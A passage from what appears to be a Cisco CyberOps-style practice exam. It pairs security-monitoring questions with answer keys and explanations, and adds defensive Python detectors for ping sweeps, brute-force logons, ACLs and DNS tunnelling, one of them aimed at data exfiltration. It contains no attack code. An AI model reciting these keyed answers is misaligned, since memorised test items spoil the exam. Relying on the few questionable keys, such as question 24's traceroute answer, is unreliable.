Option B is wrong because ARP spoofing uses forged ARP replies to bind the attacker's MAC address to another host's IP; it generates ARP traffic, not ICMP echo replies from many hosts. Option C is wrong because a port scan sends TCP SYN, UDP, or similar transport-layer probes to ports on a target to find open services; it does not elicit echo replies from a range of hosts. Option D is wrong because a Smurf attack requires echo requests sent to a directed broadcast address with a spoofed source so that the whole segment floods the victim at once; the scenario describes hosts answering the external address that probed them individually, which is the sweep pattern the exam expects, and the steady reply stream to one external host is the reconnaissance signature to act on.

20
MCQ (easy)

Refer to the exhibit. What does this syslog message indicate?

A. Failed telnet attempt
B. Denied SSH connection attempt
C. Successful SSH connection
D. Allowed TCP traffic
Answer: B

The failed login was on local port 22, the SSH port.

Why this answer

The syslog message '%SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.1.1.1] [localport: 22]' indicates a failed login attempt on port 22, which is the default port for SSH. Since the message explicitly shows 'localport: 22' and the login failed, it corresponds to a denied SSH connection attempt, not a successful one or a Telnet attempt (which uses port 23).

Exam trap

The trap here is that candidates may confuse the 'Login failed' message with a generic 'denied' message, but Cisco specifically tests the ability to identify the protocol by the port number (22 for SSH vs. 23 for Telnet) in the syslog output.

How to eliminate wrong answers

Option A is wrong because the syslog message shows 'localport: 22', which is the default port for SSH, not Telnet (port 23); a failed Telnet attempt would reference port 23. Option C is wrong because the message explicitly states 'Login failed', indicating the connection was denied, not successful. Option D is wrong because the message indicates a failed login, not allowed TCP traffic; allowed traffic would generate a different syslog message (e.g., 'LOGIN_SUCCESS' or an ACL permit log).

Question 21 (MCQ, easy)

Refer to the exhibit. What type of activity does this log represent?

A.Man-in-the-middle attack.
B.Denial-of-service (DoS) attack.
C.Brute force SSH attack.
D.Port scan.
Answer: C

Repeated connections to port 22 from one source suggest SSH brute-force.

Why this answer

The log shows repeated SSH connection attempts with 'Failed password' messages from the same source IP (10.10.0.5) to the same destination IP (10.10.0.3) for user 'admin'. This pattern of multiple failed authentication attempts in a short time window is characteristic of a brute force SSH attack, where an attacker systematically tries different passwords to gain unauthorized access.

Exam trap

Cisco often tests the distinction between a brute force attack (repeated authentication attempts) and a port scan (probing multiple ports), so the trap here is that candidates see multiple connection attempts and mistakenly think it is a port scan rather than recognizing the SSH-specific 'Failed password' messages.

How to eliminate wrong answers

Option A is wrong because a man-in-the-middle attack would involve intercepting or altering communications between two parties, not repeated failed login attempts. Option B is wrong because a denial-of-service attack aims to overwhelm a service with traffic to make it unavailable, whereas this log shows targeted authentication failures without evidence of resource exhaustion. Option D is wrong because a port scan typically involves sending packets to multiple ports to discover open services, not repeated login attempts to a single service (SSH on port 22).

Question 22 (MCQ, easy)

Which command-line tool is used to capture and analyze network packets in real time?

A.Wireshark
B.tcpdump
C.Nmap
D.Nessus
Answer: B

tcpdump is a command-line packet capture utility.

Why this answer

tcpdump is a command-line packet analyzer that captures and displays network packets in real time directly from the terminal. It uses libpcap to intercept raw packets at the network interface, making it ideal for scripting and remote session analysis where a GUI is unavailable.

Exam trap

Cisco often tests the distinction between command-line and GUI tools, trapping candidates who know Wireshark is a packet analyzer but forget the question explicitly asks for a command-line tool.

How to eliminate wrong answers

Option A is wrong because Wireshark is a GUI-based packet analyzer, not a command-line tool; it uses the same underlying capture engine as tcpdump but requires a graphical environment. Option C is wrong because Nmap is a network discovery and security scanning tool that sends probes to map hosts and services, not a real-time packet capture and analysis tool. Option D is wrong because Nessus is a vulnerability scanner that assesses systems for known weaknesses, not a tool for capturing or analyzing live network packets.

Question 23 (MCQ, hard)

A security analyst observes a sudden spike in outbound traffic from a critical server to an external IP address on TCP port 443. The server is a web application server that normally only receives inbound connections. Which type of intrusion is most likely occurring?

A.Distributed denial-of-service (DDoS) attack from the server
B.Brute-force attack on the server's SSH service
C.SQL injection attack against the server
D.Command-and-control (C2) communication from malware on the server
Answer: D

Malware often uses HTTPS outbound to establish C2 while evading detection.

Why this answer

A sudden spike in outbound traffic from a server that normally only receives inbound connections is a classic indicator of command-and-control (C2) communication. Malware on the server often establishes outbound HTTPS (TCP 443) connections to a C2 server to exfiltrate data or receive instructions, bypassing firewalls that typically allow outbound web traffic.

Exam trap

Cisco often tests the distinction between inbound attack types (like SQL injection or brute-force) and outbound indicators of compromise (like C2 traffic), leading candidates to confuse the direction of the traffic with the attack vector.

How to eliminate wrong answers

Option A is wrong because a DDoS attack from the server would involve sending a high volume of traffic to a target, but the question describes a spike to a single external IP, not a distributed flood, and the server is not typically used as an attack source. Option B is wrong because a brute-force attack on SSH would target TCP port 22, not 443, and would generate inbound traffic, not outbound spikes. Option C is wrong because an SQL injection attack is an inbound web application attack that manipulates database queries, not a cause of outbound traffic spikes to an external IP on port 443.

Question 24 (MCQ, easy)

An analyst is monitoring network traffic and notices a host sending ICMP echo requests to multiple hosts in the same subnet with a pattern of incrementing TTL values. What is the most likely purpose of this activity?

A.DNS resolution attempt.
B.Ping sweep to identify active hosts.
C.Denial of service attack against a specific host.
D.Traceroute to map the network topology.
Answer: D

Incrementing TTL is typical of traceroute.

Why this answer

The pattern of incrementing TTL values in ICMP echo requests is the hallmark of a traceroute operation. Traceroute works by sending packets with TTL=1, then TTL=2, etc., so each successive router along the path decrements the TTL to 0 and sends back an ICMP Time Exceeded message, revealing the hop-by-hop path. The target host responds with an ICMP Echo Reply when the TTL is high enough to reach it, confirming the final hop.

Exam trap

Cisco often tests the distinction between a ping sweep (fixed TTL, multiple destinations) and a traceroute (incrementing TTL, single destination), so the trap here is confusing the pattern of incrementing TTLs with a simple liveness scan.

How to eliminate wrong answers

Option A is wrong because DNS resolution uses queries to a DNS server (typically UDP port 53), not ICMP echo requests with incrementing TTLs. Option B is wrong because a ping sweep sends ICMP echo requests with a fixed TTL (usually 128 or 64) to multiple hosts to check liveness, not incrementing TTL values. Option C is wrong because a denial of service attack against a specific host would flood that single target with traffic, not send incrementing TTL probes to multiple hosts in the subnet.
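The two ICMP patterns discussed in questions 19 and 24 can be told apart mechanically. The classifier below is an added example, not part of the question bank: it groups echo requests per destination to separate an incrementing-TTL traceroute from a fixed-TTL ping sweep, and it inspects echo replies to distinguish sweep responses converging on an external prober from Smurf-style reflection converging on an internal victim. The 10.0.0.0/8 internal range and the four record sets are constructed for the example.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed assumptions (not from the question bank): the internal address
# range and four synthetic ICMP record sets, each (src, dst, icmp_type, ttl).
INTERNAL = ip_network("10.0.0.0/8")
ECHO_REPLY, ECHO_REQUEST = 0, 8

TRACEROUTE = [("10.0.0.5", "10.0.0.20", ECHO_REQUEST, ttl) for ttl in (1, 2, 3, 4)]
PING_SWEEP = [("10.0.0.5", f"10.0.0.{h}", ECHO_REQUEST, 64) for h in range(1, 11)]
SWEEP_REPLIES = [(f"10.0.0.{h}", "203.0.113.9", ECHO_REPLY, 64) for h in range(1, 11)]
SMURF_REPLIES = [(f"10.0.0.{h}", "10.0.0.99", ECHO_REPLY, 64) for h in range(1, 11)]


def classify_requests(records, min_targets=5):
    """Classify one prober's echo requests by TTL pattern and destination fan-out.

    Traceroute: TTL climbs 1, 2, 3, ... toward a destination (each hop answers
    Time Exceeded until the target itself replies).  Ping sweep: one fixed TTL
    sent to many destinations.
    """
    ttls_by_dst = defaultdict(list)
    for src, dst, icmp_type, ttl in records:
        if icmp_type == ECHO_REQUEST:
            ttls_by_dst[dst].append(ttl)
    if not ttls_by_dst:
        return "no echo requests"
    for dst, ttls in ttls_by_dst.items():
        climbing = len(ttls) > 1 and all(b == a + 1 for a, b in zip(ttls, ttls[1:]))
        if climbing and ttls[0] == 1:
            return f"traceroute toward {dst}"
    all_ttls = {ttl for ttls in ttls_by_dst.values() for ttl in ttls}
    if len(ttls_by_dst) >= min_targets and len(all_ttls) == 1:
        return f"ping sweep of {len(ttls_by_dst)} hosts (fixed TTL {all_ttls.pop()})"
    return "unclassified"


def classify_replies(records, min_hosts=5):
    """Look at echo replies: many internal hosts answering one address.

    Replies converging on an external address are the far side of a sweep
    (the external host sent the requests).  Replies converging on an internal
    address match Smurf reflection toward a spoofed internal victim.
    """
    sources_by_dst = defaultdict(set)
    for src, dst, icmp_type, _ in records:
        if icmp_type == ECHO_REPLY:
            sources_by_dst[dst].add(src)
    for dst, sources in sources_by_dst.items():
        if len(sources) < min_hosts:
            continue
        if ip_address(dst) in INTERNAL:
            return f"smurf-style reflection: {len(sources)} hosts replying to internal {dst}"
        return f"ping sweep responses: {len(sources)} hosts replying to external {dst}"
    return "no reflected reply pattern"


if __name__ == "__main__":
    for name, recs in [("TRACEROUTE", TRACEROUTE), ("PING_SWEEP", PING_SWEEP)]:
        print(name, "->", classify_requests(recs))
    for name, recs in [("SWEEP_REPLIES", SWEEP_REPLIES), ("SMURF_REPLIES", SMURF_REPLIES)]:
        print(name, "->", classify_replies(recs))
```

The request-side check keys on the TTL sequence per destination, so a traceroute aimed at several hosts in one subnet is still recognised per target, while a sweep is recognised by many targets sharing one TTL. The reply-side check is the view a sensor inside the network gets when the prober is external.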

Question 25 (MCQ, hard)

A security analyst is reviewing host-based logs from a compromised system. The Windows Security Event Log shows multiple Event ID 4625 (failed logon) from a single source IP, but no successful logon. The network team confirms that IP is a known scanning host. What is the most likely explanation for the lack of successful logon events?

A.The brute-force attack did not succeed in gaining access
B.The logon type was interactive, which is not recorded by Event ID 4625
C.The attacker successfully logged in but the logs were deleted by the attacker
D.The attacker used a pass-the-hash technique that bypasses logon events
Answer: A

Failed logons without success indicate the attacker did not compromise the account.

Why this answer

Event ID 4625 specifically records failed logon attempts. The absence of a corresponding Event ID 4624 (successful logon) from the same source IP indicates that none of the authentication attempts succeeded. Since the network team confirms the IP belongs to a known scanning host, the most likely explanation is that the brute-force attack failed to guess valid credentials.

Exam trap

Cisco often tests the misconception that a lack of successful logon events means the logs were tampered with or that certain attack types bypass logging, when in fact the absence of Event ID 4624 alongside multiple 4625 events is the definitive indicator of a failed brute-force attack.

How to eliminate wrong answers

Option B is wrong because Event ID 4625 records all failed logon attempts regardless of logon type, including interactive, network, and remote logon types; the logon type is a field within the event, not a filter for whether the event is generated. Option C is wrong because while an attacker could delete logs after a successful login, the question explicitly states the logs show multiple Event ID 4625 events but no successful logon events; if logs were deleted, the 4625 events would likely also be missing or the deletion would be evident via Event ID 1102 (log clear). Option D is wrong because pass-the-hash attacks still generate Windows Security Event Log entries; a successful pass-the-hash logon would produce Event ID 4624 (successful logon) with Logon Type 3 (network) or 9 (new credentials), not bypass logon event generation.
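The reasoning in question 25 (many 4625s, no 4624 from the same source, and no 1102) is a correlation an analyst can script. The code below is an added example, not part of the question bank; the parsed event dicts are constructed and use the field names found in the event XML (IpAddress, LogonType, TargetUserName), with 203.0.113.7 standing in for the scanning host.

```python
from collections import Counter

FAILED_LOGON = 4625      # An account failed to log on
SUCCESS_LOGON = 4624     # An account was successfully logged on
LOG_CLEARED = 1102       # The audit log was cleared

# Constructed Security-log extracts (not from the page), already parsed into
# dicts holding the fields an analyst would pull from each event's XML.
SCANNER_ONLY = [
    {"EventID": 4625, "IpAddress": "203.0.113.7", "LogonType": 3, "TargetUserName": "admin"},
    {"EventID": 4625, "IpAddress": "203.0.113.7", "LogonType": 3, "TargetUserName": "administrator"},
    {"EventID": 4625, "IpAddress": "203.0.113.7", "LogonType": 3, "TargetUserName": "backup"},
    {"EventID": 4624, "IpAddress": "10.0.2.15", "LogonType": 2, "TargetUserName": "alice"},
]
# Same scanner, but one guess eventually worked: a 4624 from the same source.
GUESSED_PASSWORD = SCANNER_ONLY + [
    {"EventID": 4624, "IpAddress": "203.0.113.7", "LogonType": 3, "TargetUserName": "backup"},
]
LOG_WIPED = [{"EventID": 1102, "IpAddress": None, "LogonType": None, "TargetUserName": "-"}]


def summarize_source(events, source_ip):
    """Count failed and successful logons attributed to one source IP."""
    failed = [e for e in events if e["EventID"] == FAILED_LOGON and e["IpAddress"] == source_ip]
    succeeded = [e for e in events if e["EventID"] == SUCCESS_LOGON and e["IpAddress"] == source_ip]
    return {
        "failed": len(failed),
        "succeeded": len(succeeded),
        "usernames_tried": Counter(e["TargetUserName"] for e in failed),
        "success_logon_types": sorted({e["LogonType"] for e in succeeded}),
        # A cleared log anywhere in the window undermines the "no 4624" inference.
        "log_cleared": any(e["EventID"] == LOG_CLEARED for e in events),
    }


def classify(summary, threshold=3):
    """Turn the counts into the verdict the question reasons through."""
    if summary["log_cleared"]:
        return "inconclusive: Event ID 1102 shows the Security log was cleared"
    if summary["failed"] >= threshold and summary["succeeded"] == 0:
        return "failed brute force: repeated 4625 with no 4624 from this source"
    if summary["failed"] >= threshold:
        return "possible compromise: 4624 from the same source after repeated 4625"
    return "no brute-force pattern"


if __name__ == "__main__":
    for label, events in [("scanner only", SCANNER_ONLY),
                          ("guessed password", GUESSED_PASSWORD),
                          ("log wiped", SCANNER_ONLY + LOG_WIPED)]:
        summary = summarize_source(events, "203.0.113.7")
        print(f"{label}: {summary['failed']} failed, {summary['succeeded']} ok -> {classify(summary)}")
```

The third scenario is why the 1102 check matters: the absence of 4624 is only evidence of failure when the log itself is intact. The success case also records the logon type, which is how a pass-the-hash style network logon (type 3) would still show up rather than "bypass" logging.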

Question 26 (MCQ, hard)

You are a security analyst for a financial institution. Over the past hour, the intrusion detection system has generated multiple alerts for outbound traffic from a single internal host (10.0.0.50) to various external IP addresses on port 443. The alerts indicate that the host is making HTTPS connections to IPs that are associated with known command and control servers. Additionally, the host has been observed making DNS queries for domains that are algorithmically generated (e.g., rgj3k2.example.com, fh7d8s.example.net). The host is a Windows 10 workstation used by an employee in the accounting department. The employee reports that they have not noticed any unusual behavior, but they did click on a link in a phishing email yesterday. The network administrator confirms that the host's firewall rules allow outbound HTTPS traffic. You have access to endpoint logs, network flow data, and packet captures. Which course of action should you take FIRST?

A.Isolate the host from the network to prevent further C2 communication
B.Analyze packet captures to determine the full extent of the compromise
C.Block all outbound HTTPS traffic from the network
D.Reimage the host immediately to remove the malware
Answer: A

Isolation stops active communication and allows for forensic analysis.

Why this answer

Option A is correct because the immediate priority when confirmed C2 communication is detected is to contain the threat by isolating the host from the network. The combination of outbound HTTPS connections to known C2 servers and algorithmically generated domain (AGD) DNS queries strongly indicates active malware infection. Isolating the host (e.g., via network access control or switch port shutdown) stops data exfiltration and further command reception, which is the first step in incident response containment before any analysis or remediation.

Exam trap

Cisco often tests the incident response priority order, and the trap here is that candidates choose analysis (Option B) or remediation (Option D) first, forgetting that containment (Option A) is the immediate required step per NIST SP 800-61 and Cisco's own incident handling framework.

How to eliminate wrong answers

Option B is wrong because analyzing packet captures to determine the full extent of compromise is a secondary step; the first action must be containment to prevent ongoing C2 traffic and lateral movement. Option C is wrong because blocking all outbound HTTPS traffic from the network is an overly broad and disruptive measure that would break legitimate business operations, and it is not a targeted containment action. Option D is wrong because reimaging the host immediately destroys volatile evidence (e.g., memory-resident malware, active network connections) and should only be performed after forensic data collection and containment.

Question 27 (MCQ, hard)

Refer to the exhibit. A security analyst reviews this ACL on a firewall between a DMZ (10.0.1.0/24) and internal network (10.0.2.0/24). What is the effect of this ACL?

A.It allows MySQL traffic from internal network to DMZ
B.It allows MySQL traffic from DMZ to internal network and blocks all other traffic
C.It blocks all traffic from DMZ to internal network
D.It allows any traffic from DMZ to internal network
Answer: B

The first line permits MySQL (port 3306), the second denies everything else.

Why this answer

The ACL is applied inbound on the DMZ interface, meaning it filters traffic arriving from the DMZ (10.0.1.0/24) destined for the internal network (10.0.2.0/24). The first line permits TCP traffic from the DMZ to the internal network on port 3306 (MySQL). The second line is an explicit deny all, which blocks any other traffic from the DMZ to the internal network.

Therefore, the ACL allows only MySQL traffic from the DMZ to the internal network and denies everything else.

Exam trap

Cisco often tests the direction of ACL application—candidates frequently mistake inbound vs. outbound filtering, leading them to think the ACL controls traffic from the internal network when it actually controls traffic from the DMZ.

How to eliminate wrong answers

Option A is wrong because the ACL is applied inbound on the DMZ interface, so it controls traffic from the DMZ to the internal network, not from the internal network to the DMZ; MySQL traffic from internal to DMZ would require a different ACL on the internal interface. Option C is wrong because the ACL does not block all traffic; it explicitly permits MySQL (port 3306) traffic from the DMZ to the internal network. Option D is wrong because the ACL does not allow any traffic; it only permits MySQL and then denies all other traffic with the explicit deny on its last line (the implicit deny any that closes every ACL would have the same effect).
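The exhibit for question 27 is not reproduced on the page, so the following added example (not the question bank's own material) constructs an ACL that matches the description, permit TCP 3306 from 10.0.1.0/24 to 10.0.2.0/24 followed by deny ip any any, and evaluates packets against it with first-match semantics, modelling the inbound-on-DMZ placement that the explanation turns on. The sequence numbers, wildcard masks and test packets are assumptions.

```python
from ipaddress import ip_address, ip_network

# Constructed ACL consistent with the question's description (the exhibit itself
# is not on the page); assumed to be applied inbound on the DMZ interface.
DMZ = ip_network("10.0.1.0/24")
ACL_TEXT = """
10 permit tcp 10.0.1.0 0.0.0.255 10.0.2.0 0.0.0.255 eq 3306
20 deny ip any any
"""


def _parse_address(tokens, i):
    """Parse 'any', 'host A.B.C.D' or 'A.B.C.D WILDCARD' starting at tokens[i]."""
    if tokens[i] == "any":
        return ip_network("0.0.0.0/0"), i + 1
    if tokens[i] == "host":
        return ip_network(tokens[i + 1] + "/32"), i + 2
    if tokens[i + 1] == "0.0.0.0":          # wildcard 0.0.0.0 means a single host
        return ip_network(tokens[i] + "/32"), i + 2
    # ip_network accepts a hostmask (Cisco wildcard) in the mask position
    return ip_network(f"{tokens[i]}/{tokens[i + 1]}", strict=False), i + 2


def parse_acl(text):
    """Parse the subset of extended-ACL syntax used above into a list of ACEs."""
    aces = []
    for line in text.strip().splitlines():
        tokens = line.split()
        if tokens[0].isdigit():              # optional sequence number
            tokens = tokens[1:]
        action, proto = tokens[0], tokens[1]
        src, i = _parse_address(tokens, 2)
        dst, i = _parse_address(tokens, i)
        dport = int(tokens[i + 1]) if i < len(tokens) and tokens[i] == "eq" else None
        aces.append({"action": action, "proto": proto, "src": src, "dst": dst, "dport": dport})
    return aces


def evaluate(aces, proto, src, dst, dport):
    """First-match evaluation; anything unmatched falls to the implicit deny."""
    for ace in aces:
        if ace["proto"] not in ("ip", proto):
            continue
        if ip_address(src) not in ace["src"] or ip_address(dst) not in ace["dst"]:
            continue
        if ace["dport"] is not None and ace["dport"] != dport:
            continue
        return ace["action"]
    return "deny"                            # implicit deny any at the end of every ACL


def inbound_on_dmz(aces, proto, src, dst, dport):
    """Model the ACL's placement: it only sees packets entering from the DMZ."""
    if ip_address(src) not in DMZ:
        return "not evaluated (traffic did not enter on the DMZ interface)"
    return evaluate(aces, proto, src, dst, dport)


if __name__ == "__main__":
    aces = parse_acl(ACL_TEXT)
    for pkt in [("tcp", "10.0.1.10", "10.0.2.5", 3306),   # DMZ web tier -> internal DB
                ("tcp", "10.0.1.10", "10.0.2.5", 80),     # anything else from the DMZ
                ("tcp", "10.0.2.5", "10.0.1.10", 3306)]:  # internal -> DMZ: other interface
        print(pkt, "->", inbound_on_dmz(aces, *pkt))
```

The direction check is the point of the question: the same ACE text placed on the internal interface would filter a different set of packets, which is why option A cannot be inferred from this ACL.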

Question 28 (MCQ, hard)

An investigator seizes a laptop as evidence from a crime scene. At the scene, the laptop is turned on and a log file is open. What should the investigator do to preserve evidence according to chain of custody procedures?

A.Close the log file and copy it to a USB drive
B.Shut down the laptop and remove the hard drive
C.Execute the log file to ensure it is legitimate
D.Photograph the screen and create a forensic image
Answer: D

This captures the current state and preserves the evidence.

Why this answer

Option D is correct because photographing the screen captures the current state and creating a forensic image preserves the data. Option A is wrong because closing the file may alter metadata or memory. Option B is wrong because shutting down may lose volatile data. Option C is wrong because executing the file could modify evidence.

Question 29 (Multi-Select, easy)

Which TWO of the following are common indicators of a denial-of-service (DoS) attack?

Select 2 answers
A.A low level of network utilization on the target server
B.A gradual increase in traffic from multiple geographic locations
C.A high number of DNS queries from diverse source IPs
D.A sudden increase in traffic from a single source IP address
E.A large number of incomplete TCP connections (SYN packets without ACK)
Answers: D, E

A sudden traffic spike from one source IP (D) and a pile-up of half-open TCP connections (E) both indicate a potential DoS attack.

Why this answer

Option D is correct because a sudden increase in traffic from a single source IP address is a classic indicator of a direct DoS attack, where the attacker uses a single compromised host to flood the target with packets, overwhelming its resources. This contrasts with a distributed denial-of-service (DDoS) attack, which uses multiple sources. The abrupt spike in volume from one IP is a clear anomaly that network monitoring tools flag as a potential DoS event.

Exam trap

Cisco often tests the distinction between a single-source DoS attack (option D) and a distributed DDoS attack (options B and C), where candidates may confuse the gradual increase from multiple locations as a DoS indicator instead of recognizing it as a DDoS characteristic.

Question 30 (MCQ, hard)

A SOC analyst is tuning a correlation rule that detects DNS tunneling. The rule currently generates 500 alerts per day, but only 5% are true positives. Which tuning approach would best reduce false positives while maintaining detection efficacy?

A.Lower the entropy threshold for domain names from 3.5 to 2.0.
B.Disable the rule and rely on manual review of DNS logs.
C.Increase the observation time window from 1 hour to 24 hours.
D.Add a condition that the number of unique domains queried per source IP exceeds 10 per minute.
Answer: D

This threshold helps differentiate tunneling from normal DNS behavior.

Why this answer

Option D is correct because adding a threshold on the number of unique domains queried per source IP reduces noise from normal high-volume DNS activity. Option C is wrong because increasing the time window may increase false positives. Option A is wrong because lowering the entropy threshold may cause more false positives. Option B is wrong because disabling the rule loses detection.

Question 31 (MCQ, medium)

A security analyst is investigating an alert that indicates a host is sending a large number of DNS queries to an external domain. The analyst wants to determine if the traffic is malicious and if it is using a DNS tunnel. Which type of analysis should the analyst perform to confirm the presence of a DNS tunnel?

A.Analyze the payload size and query frequency of the DNS packets to detect anomalous patterns.
B.Check the volume of DNS traffic from the host to identify any increase over baseline.
C.Examine the source IP addresses of the DNS queries to see if they originate from multiple hosts.
D.Review the firewall logs to identify any blocked DNS queries to the external domain.
Answer: A

DNS tunneling typically uses large payloads and unusual query patterns.

Why this answer

Option A is correct because DNS tunneling typically involves encoding data within DNS queries or responses, resulting in abnormally large payload sizes and unusual query frequencies. By analyzing these specific packet attributes, an analyst can detect the anomalous patterns characteristic of a DNS tunnel, such as high query rates to a single domain or payloads exceeding standard DNS message sizes (e.g., >512 bytes for UDP). This direct inspection of DNS packet content is the most reliable method to confirm tunneling activity.

Exam trap

Cisco often tests the distinction between detecting a general anomaly (e.g., high traffic volume) and confirming a specific technique (e.g., DNS tunneling), where candidates mistakenly choose a broad indicator like traffic volume (Option B) instead of the packet-level analysis that directly reveals the tunneling mechanism.

How to eliminate wrong answers

Option B is wrong because simply checking the volume of DNS traffic against a baseline may indicate an anomaly but does not specifically confirm a DNS tunnel; legitimate applications (e.g., frequent updates) can also cause increased volume. Option C is wrong because examining source IP addresses to see if queries originate from multiple hosts is more relevant to identifying a distributed attack (e.g., DDoS) or a compromised network segment, not a single-host DNS tunnel. Option D is wrong because reviewing firewall logs for blocked queries only shows which queries were denied, not whether a tunnel exists; a DNS tunnel often uses allowed queries (e.g., to an external domain) and may not be blocked at all.

Question 32 (MCQ, hard)

An analyst observes a sudden spike in DNS queries from an internal host to a random subdomain of a legitimate domain (e.g., randomstring.google.com). This behavior is consistent with which technique?

A.DNS tunneling for data exfiltration.
B.HTTP beaconing to a C2 server.
C.DNS amplification attack.
D.Port scanning using DNS.
Answer: A

Uses DNS queries to covertly send data.

Why this answer

The sudden spike in DNS queries to random subdomains of a legitimate domain (e.g., randomstring.google.com) is a classic indicator of DNS tunneling. This technique encodes data into DNS query names and exfiltrates it through the DNS protocol, bypassing network security controls that allow DNS traffic.

Exam trap

Cisco often tests the distinction between DNS tunneling (data exfiltration) and DNS amplification (DDoS attack), so candidates may confuse the high volume of queries in tunneling with the reflection/amplification mechanism of a DDoS attack.

How to eliminate wrong answers

Option B is wrong because HTTP beaconing involves periodic HTTP requests to a C2 server, not a burst of DNS queries to random subdomains. Option C is wrong because a DNS amplification attack uses open resolvers to flood a victim with large DNS responses, not queries from an internal host to a legitimate domain. Option D is wrong because port scanning using DNS would involve querying DNS for SRV or other records to map services, not random subdomain queries for data exfiltration.
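Questions 30, 31 and 32 all turn on the same detection features: label entropy, query name length, and the rate of unique names per source. The code below is an added example serving all three (not part of the question bank): it computes those features over constructed query records, applies the correlation rule from question 30 (entropy threshold 3.5 combined with more than 10 unique domains per source per minute), and shows why lowering the entropy threshold to 2.0 starts flagging ordinary names. The ALPHABET trick, the 10.0.0.50 tunnelling client and the benign names are constructed for the example.

```python
import math
from collections import defaultdict

# Constructed DNS query records (epoch_seconds, source_ip, qname), not from the page.
# The tunnelling client emits 12 distinct random-looking labels within one minute;
# each label is 16 distinct characters, so its Shannon entropy is exactly 4 bits.
ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"
TUNNEL = [(1000 + i, "10.0.0.50", f"{ALPHABET[i:i + 16]}.tun.example.net") for i in range(12)]
BENIGN = [
    (1000, "10.0.0.8", "www.example.com"),
    (1005, "10.0.0.8", "mail.example.com"),
    (1010, "10.0.0.8", "cdn.example.net"),
    (1015, "10.0.0.8", "login.example.com"),
]
ALL_QUERIES = TUNNEL + BENIGN


def shannon_entropy(text):
    """Bits per character of the text's character distribution (0 for 'www')."""
    if not text:
        return 0.0
    total = len(text)
    return -sum(text.count(c) / total * math.log2(text.count(c) / total) for c in set(text))


def first_label(qname):
    """The leftmost label is where tunnelling tools usually place encoded data."""
    return qname.split(".")[0]


def extract_features(records, window_s=60):
    """Per source: peak unique names per window, max label entropy, max qname length."""
    unique = defaultdict(set)
    feats = defaultdict(lambda: {"peak_unique_per_window": 0, "max_entropy": 0.0, "max_qname_len": 0})
    for ts, src, qname in records:
        unique[(src, ts // window_s)].add(qname)
        f = feats[src]
        f["max_entropy"] = max(f["max_entropy"], shannon_entropy(first_label(qname)))
        f["max_qname_len"] = max(f["max_qname_len"], len(qname))
    for (src, _), names in unique.items():
        feats[src]["peak_unique_per_window"] = max(feats[src]["peak_unique_per_window"], len(names))
    return dict(feats)


def flag_sources(records, entropy_threshold=3.5, unique_per_minute=10):
    """Correlation rule: high-entropy labels AND more than N unique names per minute."""
    feats = extract_features(records, window_s=60)
    return sorted(src for src, f in feats.items()
                  if f["max_entropy"] > entropy_threshold
                  and f["peak_unique_per_window"] > unique_per_minute)


def count_high_entropy(records, entropy_threshold):
    """How many individual queries the entropy test alone would flag."""
    return sum(1 for _, _, q in records if shannon_entropy(first_label(q)) > entropy_threshold)


if __name__ == "__main__":
    for src, f in extract_features(ALL_QUERIES).items():
        print(src, f)
    print("flagged:", flag_sources(ALL_QUERIES))
    print("queries over entropy 3.5:", count_high_entropy(ALL_QUERIES, 3.5))
    print("queries over entropy 2.0:", count_high_entropy(ALL_QUERIES, 2.0))
```

With the page's thresholds only 10.0.0.50 is flagged. Dropping the entropy threshold to 2.0 (question 30, option A) additionally catches the benign "login" label, which is the false-positive inflation the explanation warns about; requiring the per-minute unique-name rate as well (option D) is what keeps a single odd-looking name from firing the rule.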

Question 33 (MCQ, easy)

A network administrator has configured a SPAN port to send traffic to an intrusion detection system (IDS). However, the IDS is not seeing traffic from a specific VLAN. What is the most likely cause?

A.The SPAN source does not include that VLAN.
B.The IDS interface is set to promiscuous mode.
C.The SPAN destination port is in trunk mode.
D.The IDS is in inline mode.
Answer: A

If the VLAN is not in the SPAN source list, its traffic is not monitored.

Why this answer

A SPAN (Switched Port Analyzer) port copies traffic from specified source interfaces or VLANs to a destination port. If the IDS is not seeing traffic from a specific VLAN, the most likely cause is that the SPAN configuration does not include that VLAN as a source. The administrator must explicitly specify the VLAN(s) to monitor using the `monitor session` command with the `vlan` keyword; otherwise, traffic from that VLAN will not be forwarded to the IDS.

Exam trap

Cisco often tests the misconception that SPAN automatically mirrors all VLANs on a trunk port, when in fact the administrator must explicitly specify which VLANs to monitor using the `vlan` keyword in the SPAN configuration.

How to eliminate wrong answers

Option B is wrong because setting the IDS interface to promiscuous mode is a requirement for the IDS to receive all packets on a SPAN destination, not a cause of missing VLAN traffic. Option C is wrong because the SPAN destination port being in trunk mode is irrelevant; SPAN destination ports are typically access ports or configured as trunk only if needed for encapsulation, but trunk mode does not prevent traffic from a specific VLAN from being seen. Option D is wrong because if the IDS were in inline mode, it would be placed directly in the traffic path and would inherently see all VLAN traffic; the problem described is about a SPAN-based (out-of-band) deployment, so inline mode is not applicable.

Question 34 (MCQ, easy)

What is the primary goal of the 'integrity' pillar of the CIA triad?

A.Keep data secret from unauthorized users
B.Ensure data is accessible when needed
C.Provide proof that a user performed an action
D.Protect data from unauthorized modification
Answer: D

Integrity prevents unauthorized changes.

Why this answer

The 'integrity' pillar of the CIA triad ensures that data is not altered or tampered with by unauthorized parties. This is achieved through mechanisms such as hashing (e.g., SHA-256), checksums, and digital signatures that detect any unauthorized modification. Option D correctly identifies this goal, as protecting data from unauthorized modification is the core purpose of integrity controls.

Exam trap

Cisco often tests the distinction between integrity and non-repudiation, as candidates may confuse 'proof of action' (non-repudiation) with 'data unchanged' (integrity), leading them to incorrectly select Option C.

How to eliminate wrong answers

Option A is wrong because keeping data secret from unauthorized users is the goal of the 'confidentiality' pillar, not integrity. Option B is wrong because ensuring data is accessible when needed is the goal of the 'availability' pillar, not integrity. Option C is wrong because providing proof that a user performed an action is the goal of 'non-repudiation', which is often associated with digital signatures and audit logs, not the integrity pillar itself.

Question 35 (MCQ, medium)

You are analyzing network traffic from a compromised host. The host is running Windows and is connected to a corporate network. The IDS generated an alert for a known malware signature matching traffic from the host to an external IP on port 443. However, you see that the traffic is encrypted and the destination IP is a cloud storage provider. The host also shows periodic DNS queries to a domain that closely resembles the cloud provider's domain but with a single character difference (typosquatting). The employee on that host reports no unusual activity. Which step should you take first to confirm the compromise?

A.Check DNS logs to see if the typosquatted domain resolved recently and correlate with the encrypted traffic timestamps.
B.Dismiss the alert as a false positive because the user reports no issues.
C.Examine the full packet capture for the encrypted session to see the payload.
